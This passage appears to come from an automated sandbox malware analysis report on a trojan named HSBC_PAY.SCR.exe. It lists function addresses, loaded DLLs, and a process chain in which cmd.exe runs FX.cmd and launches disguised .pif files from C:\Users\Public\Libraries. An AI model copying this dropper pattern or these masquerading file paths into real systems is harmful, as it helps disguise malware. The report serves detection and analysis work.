                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BF7B08_2_1E8BF7B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7F14608_2_1E7F1460
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BF43F8_2_1E8BF43F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E89D5B08_2_1E89D5B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8C95C38_2_1E8C95C3
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B75718_2_1E8B7571
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8052A08_2_1E8052A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E81B2C08_2_1E81B2C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8A12ED8_2_1E8A12ED
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E84739A8_2_1E84739A
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7ED34C8_2_1E7ED34C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B132D8_2_1E8B132D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8070C08_2_1E8070C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8AF0CC8_2_1E8AF0CC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B70E98_2_1E8B70E9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BF0E08_2_1E8BF0E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7EF1728_2_1E7EF172
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E80B1B08_2_1E80B1B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8CB16B8_2_1E8CB16B
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E83516C8_2_1E83516C
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E812E908_2_1E812E90
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BCE938_2_1E8BCE93
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BEEDB8_2_1E8BEEDB
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BEE268_2_1E8BEE26
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E800E598_2_1E800E59
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E87EFA08_2_1E87EFA0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E842F288_2_1E842F28
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E820F308_2_1E820F30
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7F2FC88_2_1E7F2FC8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8A2F308_2_1E8A2F30
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E874F408_2_1E874F40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8A0CB58_2_1E8A0CB5
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E800C008_2_1E800C00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7F0CF28_2_1E7F0CF2
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E818DBF8_2_1E818DBF
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E80AD008_2_1E80AD00
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E89CD1F8_2_1E89CD1F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7FADE08_2_1E7FADE0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7FEA808_2_1E7FEA80
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B6BD78_2_1E8B6BD7
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BAB408_2_1E8BAB40
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E82E8F08_2_1E82E8F0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E80A8408_2_1E80A840
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8028408_2_1E802840
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7E68B88_2_1E7E68B8
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8029A08_2_1E8029A0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8CA9A68_2_1E8CA9A6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8169628_2_1E816962
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E81C6E08_2_1E81C6E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7FC7C08_2_1E7FC7C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8247508_2_1E824750
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8007708_2_1E800770
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8AE4F68_2_1E8AE4F6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8A44208_2_1E8A4420
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B24468_2_1E8B2446
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8C05918_2_1E8C0591
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8005358_2_1E800535
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8802C08_2_1E8802C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8A02748_2_1E8A0274
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8C03E68_2_1E8C03E6
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E80E3F08_2_1E80E3F0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8BA3528_2_1E8BA352
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8920008_2_1E892000
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8C01AA8_2_1E8C01AA
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B41A28_2_1E8B41A2
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8B81CC8_2_1E8B81CC
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E7F01008_2_1E7F0100
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E89A1188_2_1E89A118
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_2_1E8881588_2_1E888158
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_004015608_1_00401560
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_004020588_1_00402058
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_004025B08_1_004025B0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_004028708_1_00402870
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_004010E08_1_004010E0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_004032308_1_00403230
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_004012C08_1_004012C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_004033508_1_00403350
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_004015538_1_00401553
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_00401D698_1_00401D69
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 8_1_00401D708_1_00401D70
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\uzonfntK.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFCode function: String function: 029946A4 appears 154 times
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFCode function: String function: 029A8798 appears 48 times
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFCode function: String function: 0299480C appears 619 times
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: String function: 29027E54 appears 108 times
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: String function: 1E835130 appears 58 times
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: String function: 1E86EA12 appears 86 times
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: String function: 29015130 appears 58 times
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: String function: 2905F290 appears 105 times
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: String function: 1E847E54 appears 108 times
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: String function: 1E7EB970 appears 265 times
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: String function: 1E87F290 appears 105 times
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: String function: 28FCB970 appears 265 times
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: String function: 2904EA12 appears 86 times
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: String function: 02A844D0 appears 32 times
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: String function: 02A846A4 appears 244 times
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: String function: 02A9881C appears 45 times
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: String function: 02A98798 appears 54 times
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: String function: 02A844AC appears 73 times
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: String function: 02A8480C appears 931 times
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs HSBC_PAY.SCR.exe
                      Source: HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs HSBC_PAY.SCR.exe
                      Source: HSBC_PAY.SCR.exe, 00000000.00000003.1698754941.00000000216A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs HSBC_PAY.SCR.exe
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs HSBC_PAY.SCR.exe
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs HSBC_PAY.SCR.exe
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs HSBC_PAY.SCR.exe
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs HSBC_PAY.SCR.exe
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs HSBC_PAY.SCR.exe
                      Source: HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs HSBC_PAY.SCR.exe
                      Source: HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs HSBC_PAY.SCR.exe
                      Source: HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.000000002080C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs HSBC_PAY.SCR.exe
                      Source: HSBC_PAY.SCR.exe, 00000000.00000003.1698754941.00000000216D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs HSBC_PAY.SCR.exe
                      Source: HSBC_PAY.SCR.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@21/7@2/2
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A87F52 GetDiskFreeSpaceA,0_2_02A87F52
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A96D48 CoCreateInstance,0_2_02A96D48
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeFile created: C:\Users\Public\KtnfnozuF.cmdJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6808:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2188:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_03
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: HSBC_PAY.SCR.exeReversingLabs: Detection: 50%
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeFile read: C:\Users\user\Desktop\HSBC_PAY.SCR.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\HSBC_PAY.SCR.exe "C:\Users\user\Desktop\HSBC_PAY.SCR.exe"
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess created: C:\Users\Public\Libraries\uzonfntK.pif C:\Users\Public\Libraries\uzonfntK.pif
                      Source: unknownProcess created: C:\Users\Public\Libraries\Ktnfnozu.PIF "C:\Users\Public\Libraries\Ktnfnozu.PIF"
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess created: C:\Users\Public\Libraries\uzonfntK.pif C:\Users\Public\Libraries\uzonfntK.pif
                      Source: unknownProcess created: C:\Users\Public\Libraries\Ktnfnozu.PIF "C:\Users\Public\Libraries\Ktnfnozu.PIF"
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess created: C:\Users\Public\Libraries\uzonfntK.pif C:\Users\Public\Libraries\uzonfntK.pif
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess created: C:\Users\Public\Libraries\uzonfntK.pif C:\Users\Public\Libraries\uzonfntK.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess created: C:\Users\Public\Libraries\uzonfntK.pif C:\Users\Public\Libraries\uzonfntK.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess created: C:\Users\Public\Libraries\uzonfntK.pif C:\Users\Public\Libraries\uzonfntK.pifJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: url.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: winhttpcom.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection loaded: ?.dllJump to behavior
